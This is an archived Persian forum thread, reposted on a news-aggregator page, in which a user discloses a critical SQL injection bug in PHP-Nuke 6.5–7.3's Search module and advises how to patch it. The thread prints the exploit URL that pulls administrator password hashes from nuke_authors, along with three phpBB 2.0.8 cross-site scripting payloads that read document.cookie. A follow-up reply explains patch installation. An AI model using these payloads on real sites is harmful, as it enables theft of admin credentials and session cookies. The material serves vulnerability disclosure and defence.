تور لحظه آخری
امروز : یکشنبه ، 9 اردیبهشت 1403    احادیث و روایات:  امام موسی کاظم (ع):هر که می خواهد که قویترین مردم باشد بر خدا توکل نماید.
سرگرمی سبک زندگی سینما و تلویزیون فرهنگ و هنر پزشکی و سلامت اجتماع و خانواده تصویری دین و اندیشه ورزش اقتصادی سیاسی حوادث علم و فناوری سایتهای دانلود گوناگون شرکت ها

تبلیغات

بلومبارد

تبلیغات متنی

تریدینگ ویو

خرید اکانت اسپاتیفای

کاشت ابرو

لمینت دندان

ونداد کولر

لیست قیمت گوشی شیائومی

صرافی ارکی چنج

صرافی rkchange

دانلود سریال سووشون

دانلود فیلم

ناب مووی

تعمیر گیربکس اتوماتیک

دیزل ژنراتور موتور سازان

سرور اختصاصی ایران

سایت ایمالز

تور دبی

سایبان ماشین

جملات زیبا

دزدگیر منزل

ماربل شیت

تشریفات روناک

آموزش آرایشگری رایگان

طراحی سایت تهران سایت

آموزشگاه زبان

اجاره سند در شیراز

ترازوی آزمایشگاهی

رنگ استخری

فروش اقساطی کوییک

راهبند تبریز

ترازوی آزمایشگاهی

قطعات لیفتراک

وکیل تبریز

خرید اجاق گاز رومیزی

آموزش ارز دیجیتال در تهران

شاپیفای چیست

فروش اقساطی ایران خودرو

واردات از چین

قیمت نردبان تاشو

وکیل کرج

قیمت فنس

armanekasbokar

armanetejarat

صندوق تضمین

سیسمونی نوزاد

پراپ تریدینگ معتبر ایرانی

نهال گردو

صنعت نواز

پیچ و مهره

خرید اکانت اسپاتیفای

صنعت نواز

لوله پلی اتیلن

کرم ضد آفتاب لاکچری کوین SPF50

دانلود آهنگ

طراحی کاتالوگ فوری

واردات از چین

اجاره کولر

دفتر شکرگزاری

تسکین فوری درد بواسیر

دانلود کتاب صوتی

تعمیرات مک بوک

قیمت فرش

خرید سی پی ارزان

 






آمار وبسایت

 تعداد کل بازدیدها : 1798549850




هواشناسی

نرخ طلا سکه و  ارز

قیمت خودرو

فال حافظ

تعبیر خواب

فال انبیاء

متن قرآن



اضافه به علاقمنديها ارسال اين مطلب به دوستان آرشيو تمام مطالب
archive  refresh

جديدترين باگ در PHPNUKE - تاريخ : 27 فروردين -


واضح آرشیو وب فارسی:سایت ریسک: t=14428">جديدترين باگ در PHPNUKE - تاريخ : 27 فروردين amirfigo_62 27 تير 1383, 18:10جديترين باگ در PHPNUKE نسخه هاي اسيب پذير : PHP-NUKE 6.5 - 7.3 درجه : critical نويسنده : Janek Vind در تاريخ 27 فروردين و كمتر از 6 ساعت قبل باگ جديدي در ماژول Search پيدا شد كه امكان بدست اوردن MD 5 مدير سايت را به نفوذگر ميدهد كد اكسپلويت : modules.php?name=Search&type=comments& query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors مثال : exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors در صورتي كه سايت شما از سيستم امنيتي استفاده ميكند و كدهايي مثل * و UNION فيلتر شده هستند اين باگ خطري براي سايت شما ندارد در غير اين صورت تا ارائه patch ماژول Search را غير فعال كنيد دريافت سيستم امنيتي مشهدتيم :‌ بزودي Patch اين باگ توسط گروه مشهدتيم ارائه خواهد شد همچنين چند اكسپلويت براي PHPBB 2.0.8 كشف شده كه عبارتند از‌: ;//localhost/phpbb 208/faq.php? faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=amir و ;//localhost/phpbb 208/faq.php?mode=bbcode& faq[0][0]=f00<script>alert(document.cookie);</script>bar&faq[0][1]=amir و ;//localhost/phpbb 208/index.php?category_rows[0][cat_id]=1 &category_rows[0][cat_title]=amir<script>alert(document.cookie);</script> &category_rows[0][cat_order]=99 ------------------ عضويت در خبرنامه اختصاصي PHPNUKE : ايميل خود را به [email protected] ارسال كنيد Ashioone007 28 تير 1383, 13:37من patch مشهد تيم رو دريافت كردم ولي نمي تونم در كپوم قسمت بايد آپلود كنم ممنون مي شم منو راهنمايي كنيد amirfigo_62 28 تير 1383, 15:04سلام patch رو از ادرس : دريافت كنيد يك سري پوشه مثل modules - includes داره كه خوب بايد فايلاش جايگزين قبليا بشه فايل هايي هم كه در شاخه اصلي بايد باشه مثل mainfile.php - index.php هم به همين صورت وقتي دارين فايلا رو اپلود ميكنيد كافيه موقعي كه از شما سوال ميشه ميخواين فايل ها over right بشه شما yes to all رو بزنيد تا بصورت كامل patch نصب بشه مثلا اگه فايل class_sql_inject.php رو از پوشه includes اپلود نكنيد سايت شما پيغام خطا ميده چون در mainfile.php تعريف شده كه اول اين فايل فراخواني بشه تا تست كنه ادرسي كه درخواست شده معتبر هست و از كدهاي غير مجاز توش استفاده ميشه يا نه موفق باشيد امير




این صفحه را در گوگل محبوب کنید

[ارسال شده از: سایت ریسک]
[مشاهده در: www.ri3k.eu]
[تعداد بازديد از اين مطلب: 854]

bt

اضافه شدن مطلب/حذف مطلب







-


گوناگون

پربازدیدترینها
طراحی وب>


صفحه اول | تمام مطالب | RSS | ارتباط با ما
1390© تمامی حقوق این سایت متعلق به سایت واضح می باشد.
این سایت در ستاد ساماندهی وزارت فرهنگ و ارشاد اسلامی ثبت شده است و پیرو قوانین جمهوری اسلامی ایران می باشد. لطفا در صورت برخورد با مطالب و صفحات خلاف قوانین در سایت آن را به ما اطلاع دهید
پایگاه خبری واضح کاری از شرکت طراحی سایت اینتن